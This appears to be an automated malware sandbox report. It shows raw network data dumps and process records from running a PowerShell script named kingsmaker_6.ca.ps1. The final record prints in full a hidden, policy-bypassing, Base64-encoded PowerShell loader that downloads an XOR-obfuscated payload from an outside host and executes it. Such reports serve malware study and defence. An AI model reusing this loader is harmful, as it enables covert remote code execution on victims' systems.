Ascii: HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHICH\|.HHHHHHHHHJICIJQHDFHH[HHHHH4EFHHXHHHxFHHHHHXHHHJHHNHHHHHHHNHHHHHHHHxjHHLHHHHHHKHHHXHHHHHHXHHXHHHHHHXHHHHXGH9HHHHFHLYHHHXHHYHHHHHHHHHHHHHHHHHHGHDIHHHHHHHHHHHHHHHHHHHHHHHHHHxGHPHHHHHHHHHH
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 5a 08 48 4b 40 0a 31 3c 2d 0a 27 27 24 48 48 48 48 c8 b7 b7 b7 37 60 5a 08 48 4d 0e 29 24 3b 2d 4c 1c 3a 3d 2d 4e 1b 31 3b 3c 2d 25 4a 48 48 14 5a 08 48 4b 40 1f 27 3a 2c 0a 27 27 24 4a 48 48 48 c8 b7 b7 b7 37 10 5a 08 48 4d 0e 29 24 3b 2d 4c 1c 3a 3d 2d 4e 1b 31 3b 3c 2d 25 4a 48 48 c4 5a 08 48 4b 40 04 27 26 2f 0a 27 27 24 4c 48 48 48 c8 b7 b7 b7 37 c0 5a 08 48 4d 0e 29 24 3b 2d 4c 1c 3a 3d 2d 4e 1b 31 3b 3c 2d 25 4a 48 48 f4 5a 08 48 5a 4e 3b 3c 3a 21 26 2f 4a 48 48 48 84 5a 08 48 43 42 1f 21 2c 2d 1b 3c 3a 21 26 2f 4a 48 48 48 a8 5a 08 48 42 42 09 26 3b 21 1b 3c 3a 21 26 2f 48 48 4a 48 bc 5a 08 48 44 4f 1e 29 3a 21 29 26 3c 4a 48 48 4c 5b 08 48 44 42 07 24 2d 1e 29 3a 21 29 26 3c 4a 48 48 48 50 5b 08 48 5b 4e 1c 0b 24 29 3b 3b d4 57 08 48 4a 48 48 48 Data Ascii: ZHK@1<-''$HHHH7`ZHM)$;-L:=-N1;<-%JHHZHK@':,''$JHHH7ZHM)$;-L:=-N1;<-%JHHZHK@'&/''$LHHH7ZHM)$;-L:=-N1;<-%JHHZHZN;<:!&/JHHHZHCB!,-<:!&/JHHHZHBB&;!<:!&/HHJHZHDO):!)&<JHHL[HDB$-):!)&<JHHHP[H[N$);;WHJHHH
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 08 48 0c 48 bc b7 88 50 08 48 0a 48 bc b7 ac 50 08 48 0a 48 bc b7 45 51 08 48 0b 48 bc b7 03 51 08 48 0a 48 bc b7 32 51 08 48 0a 48 bc b7 eb 51 08 48 0b 48 bc b7 9f 51 08 48 0b 48 bc b7 58 52 08 48 0b 48 bc b7 73 52 08 48 0b 48 bc b7 2c 52 08 48 0b 48 bc b7 d8 52 08 48 0b 48 bc b7 84 52 08 48 0b 48 bc b7 4f 53 08 48 0b 48 bc b7 0a 53 08 48 0b 48 bc b7 c0 53 08 48 0b 48 bc b7 8d 53 08 48 0a 48 bc b7 b7 53 08 48 0a 48 bc b7 71 54 08 48 0a 48 bc b7 37 54 08 48 0b 48 bc b7 f5 54 08 48 0b 48 bc b7 a6 54 08 48 0b 48 bc b7 69 55 08 48 0b 48 bc b7 1d 55 08 48 02 48 bd b7 c0 55 08 48 02 48 be b7 fb 55 08 48 02 48 bf b7 ae 55 08 48 02 48 b0 b7 09 56 08 48 02 48 b1 b7 3a 56 08 48 02 48 b2 b7 eb 56 08 48 02 48 b3 b7 94 56 08 48 02 48 b4 b7 53 57 08 48 03 48 b5 b7 0e Data Ascii: HHPHHPHHEQHHQHH2QHHQHHQHHXRHHsRHH,RHHRHHRHHOSHHSHHSHHSHHSHHqTHH7THHTHHTHHiUHHUHHUHHUHHUHHVHH:VHHVHHVHHSWHH
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 40 48 49 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 48 7b 48 98 d8 08 48 40 1d 26 21 3c 06 29 25 2d 4b 48 f0 5a 08 48 40 48 4a 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 08 f0 5a 08 48 49 48 49 49 4a 48 4a 48 7c 48 70 d9 08 48 41 1d 26 21 3c 1b 2b 27 38 2d 4b 48 f0 5a 08 48 40 48 4a 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 08 f0 5a 08 48 49 48 49 49 4a 48 4a 48 7b 48 54 d8 08 48 4e 0d 39 3d 29 24 3b 4b 48 48 58 08 48 40 48 4a 40 d4 57 08 48 48 48 4c 1b 2d 24 2e 4a 48 40 d4 57 08 48 49 48 4b 07 2a 22 4a 48 4a 48 63 48 6c d8 08 48 43 0f 2d 3c 00 29 3b 20 0b 27 2c 2d 4b 48 d4 58 08 48 40 48 49 40 d4 57 08 48 48 48 4c 1b 2d 24 2e 4a 48 4a 48 7b 48 44 db 08 48 40 1c 27 1b 3c 3a 21 26 2f 4b 48 f0 5a 08 48 40 48 4a 40 d4 57 08 48 48 48 4c 1b 2d 24 2e 4a 48 08 Data Ascii: @HIHHHHHHHL-$.JHJH{HH@&!<)%-KHZH@HJHHHHHHHL-$.JHZHIHIIJHJH\|HpHA&!<+'8-KHZH@HJHHHHHHHL-$.JHZHIHIIJHJH{HTHN9=)$;KHHXH@HJ@WHHHL-$.JH@WHIHK*"JHJHcHlHC-<); ',-KHXH@HI@WHHHL-$.JHJH{HDH@'<:!&/KHZH@HJ@WHHHL-$.JH
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 4f 59 1e 27 24 29 3c 21 24 2d 09 3c 3c 3a 21 2a 3d 3c 2d 50 6a 08 48 7c 68 08 48 48 48 4e 1b 31 3b 3c 2d 25 48 48 48 48 4a 48 48 48 f0 6a 08 48 48 48 48 48 48 48 48 48 48 48 48 48 14 6b 08 48 48 48 48 48 f0 6a 08 48 48 48 48 48 86 6a 08 48 40 48 48 48 8c 57 08 48 54 d8 08 48 6c d8 08 48 44 db 08 48 4c db 08 48 6c db 08 48 60 db 08 48 64 db 08 48 68 db 08 48 a4 c5 08 48 4c c6 08 48 b8 c6 08 48 48 48 4a 48 96 6a 08 48 0c 48 bc b7 5b 6b 08 48 0c 48 bc b7 48 48 47 00 18 18 0f 0d 06 09 3c 3c 3a 21 2a 3d 3c 2d 7d 48 50 34 08 48 4e 0b 3a 2d 29 3c 2d 4b 48 48 48 48 48 40 48 4a 40 10 6b 08 48 48 48 4c 1b 2d 24 2e 4a 48 4a f0 5a 08 48 4a 48 4d 09 0c 29 3c 29 4a 48 4a 48 0c 48 70 34 08 48 4e 0b 3a 2d 29 3c 2d 4b 48 48 48 48 48 44 48 4b 40 10 6b 08 48 48 48 4c 1b 2d Data Ascii: OY'$)<!$-<<:!=<-PjH\|hHHHN1;<-%HHHHJHHHjHHHHHHHHHHHHHkHHHHHjHHHHHjH@HHHWHTHlHDHLHlH`HdHhHHLHHHHJHjHH[kHHHHG<<:!=<-}HP4HN:-)<-KHHHHH@HJ@kHHHL-$.JHJZHJHM)<)JHJHHp4HN:-)<-KHHHHHDHK@kHHHL-
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 48 48 cb 0c 6c 4c b0 a1 c3 a8 48 48 cb 0c 6c 4c b0 a1 d5 a8 48 48 84 cd 6f 08 48 c7 6f 08 48 d1 6f 08 48 49 48 48 48 48 48 48 48 48 48 48 48 88 48 48 48 48 48 48 0e ec 6f 08 48 40 48 48 48 48 48 48 48 a0 6e 08 48 64 60 08 48 f8 6f 08 48 48 48 48 48 48 48 48 48 5c 61 08 48 64 60 08 48 1b 60 08 48 48 48 48 48 39 60 08 48 58 48 48 48 6c 5f 08 48 54 d8 08 48 6c d8 08 48 44 db 08 48 4c db 08 48 84 4f 09 48 90 4f 09 48 64 db 08 48 68 db 08 48 a4 4f 09 48 4c c6 08 48 b8 c6 08 48 48 48 48 48 48 48 49 48 49 d4 58 08 48 4c 48 48 48 41 0e 1a 2d 2e 0b 27 3d 26 3c 44 48 78 6a 08 48 98 c6 08 48 48 48 48 48 4b 48 cb 60 08 48 02 48 b1 b7 fc 60 08 48 02 48 b2 b7 ad 60 08 48 03 48 b5 b7 48 48 59 1c 01 26 3c 2d 3a 2e 29 2b 2d 2c 07 2a 22 2d 2b 3c 79 48 84 4f 09 48 59 09 2e Data Ascii: HHlLHHlLHHoHoHoHIHHHHHHHHHHHHHHHHHoH@HHHHHHHnHd`HoHHHHHHHHH\aHd`H`HHHHH9`HXHHHl_HTHlHDHLHOHOHdHhHOHLHHHHHHHHIHIXHLHHHA-.'=&<DHxjHHHHHHKH`HH`HH`HHHHY&<-:.)+-,*"-+<yHOHY.
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 48 48 48 48 48 4a 4d 1e 1c 31 38 2d 4a 48 84 58 08 48 4a 48 48 48 4a 41 1a 2d 3b 2d 3a 3e 2d 2c 79 4a 48 84 58 08 48 4c 48 48 48 4a 41 1a 2d 3b 2d 3a 3e 2d 2c 7a 4a 48 84 58 08 48 4e 48 48 48 4a 41 1a 2d 3b 2d 3a 3e 2d 2c 7b 4a 48 c8 58 08 48 40 48 48 48 4a 41 1e 1b 25 29 24 24 01 26 3c 4a 48 d4 58 08 48 40 48 48 48 4a 40 1e 01 26 3c 2d 2f 2d 3a 4a 48 c4 59 08 48 40 48 48 48 4a 4f 1e 1b 21 26 2f 24 2d 4a 48 f8 59 08 48 40 48 48 48 4a 4f 1e 0c 27 3d 2a 24 2d 4a 48 98 59 08 48 40 48 48 48 4a 41 1e 0b 3d 3a 3a 2d 26 2b 31 4a 48 68 63 08 48 40 48 48 48 4a 4d 1e 0c 29 3c 2d 4a 48 58 5a 08 48 40 48 48 48 4a 4f 1e 07 24 2d 1b 3c 3a 4a 48 48 59 08 48 40 48 48 48 4a 41 1e 0c 21 3b 38 29 3c 2b 20 4a 48 60 5b 08 48 40 48 48 48 4a 4e 1e 0d 3a 3a 27 3a 4a 48 10 5a 08 Data Ascii: HHHHHJM18-JHXHJHHHJA-;-:>-,yJHXHLHHHJA-;-:>-,zJHXHNHHHJA-;-:>-,{JHXH@HHHJA%)$$&<JHXH@HHHJ@&<-/-:JHYH@HHHJO!&/$-JHYH@HHHJO'=*$-JHYH@HHHJA=::-&+1JHhcH@HHHJM)<-JHXZH@HHHJO$-<:JHHYH@HHHJA!;8)<+ JH`[H@HHHJN::':JHZ
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 48 4e 0b 3a 2d 29 3c 2d 48 48 48 48 48 48 49 48 1c 59 08 48 4e 09 1e 29 24 3d 2d 4a 48 4a 48 42 f8 43 09 48 4e 0b 3a 2d 29 3c 2d 48 48 48 48 48 48 49 48 48 59 08 48 4e 09 1e 29 24 3d 2d 4a 48 4a 48 40 fc 43 09 48 41 1c 27 18 27 21 26 3c 2d 3a 48 48 48 59 08 48 48 4a 48 40 f0 43 09 48 41 1c 27 01 26 3c 2d 2f 2d 3a 48 48 1c 59 08 48 48 4a 48 43 f4 43 09 48 44 6e 27 38 17 0d 39 3d 29 24 21 3c 31 48 48 48 58 08 48 4a 48 40 7a 08 48 4c 04 2d 2e 3c 4a 48 48 40 7a 08 48 4d 1a 21 2f 20 3c 4a 48 4a 48 43 9c 43 09 48 46 6e 27 38 17 01 26 2d 39 3d 29 24 21 3c 31 48 48 48 58 08 48 4a 48 40 7a 08 48 4c 04 2d 2e 3c 4a 48 48 40 7a 08 48 4d 1a 21 2f 20 3c 4a 48 4a 48 48 3c 7b 08 48 48 48 48 48 48 48 48 48 48 48 48 48 9c 02 08 48 48 48 48 48 3c 7b 08 48 48 48 48 48 da 7d Data Ascii: HN:-)<-HHHHHHIHYHN)$=-JHJHBCHN:-)<-HHHHHHIHHYHN)$=-JHJH@CHA''!&<-:HHHYHHJH@CHA'&<-/-:HHYHHJHCCHDn'89=)$!<1HHHXHJH@zHL-.<JHH@zHM!/ <JHJHCCHFn'8&-9=)$!<1HHHXHJH@zHL-.<JHH@zHM!/ <JHJHH<{HHHHHHHHHHHHHHHHHH<{HHHHH}
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 58 08 48 40 48 4d 0b 27 3d 26 3c 4a 48 4a 48 2a 48 98 44 09 48 4c 0b 27 38 31 4b 48 48 48 48 48 58 48 4d 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 40 7a 08 48 49 48 4b 1b 3a 2b 4a 48 49 84 03 08 48 4a 48 4c 0c 2d 3b 3c 4a 48 48 d4 58 08 48 44 48 42 1b 3c 29 3a 3c 01 26 2c 2d 30 4a 48 48 d4 58 08 48 40 48 4d 0b 27 3d 26 3c 4a 48 4a 48 2a 48 b8 44 09 48 4c 0b 27 38 31 4b 48 48 48 48 48 58 48 4d 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 4c 04 08 48 49 48 4b 1b 3a 2b 4a 48 48 d4 58 08 48 4a 48 42 1b 3c 29 3a 3c 01 26 2c 2d 30 4a 48 48 40 7a 08 48 44 48 4c 0c 2d 3b 3c 4a 48 48 d4 58 08 48 40 48 4d 0b 27 3d 26 3c 4a 48 4a 48 2a 48 40 45 09 48 4c 0b 27 38 31 4b 48 48 48 48 48 58 48 4d 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 40 7a 08 48 49 48 4b 1b 3a Data Ascii: XH@HM'=&<JHJHHDHL'81KHHHHHXHMHHHHHHHL-$.JHJ@zHIHK:+JHIHJHL-;<JHHXHDHB<):<&,-0JHHXH@HM'=&<JHJHHDHL'81KHHHHHXHMHHHHHHHL-$.JHJLHIHK:+JHHXHJHB<):<&,-0JHH@zHDHL-;<JHHXH@HM'=&<JHJH*H@EHL'81KHHHHHXHMHHHHHHHL-$.JHJ@zHIHK:

Target ID:	1
Start time:	03:08:54
Start date:	29/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1"
Imagebase:	0x7ff69c770000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	03:09:02
Start date:	29/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x7ff69c770000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	03:09:06
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
Imagebase:	0x7ff619390000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true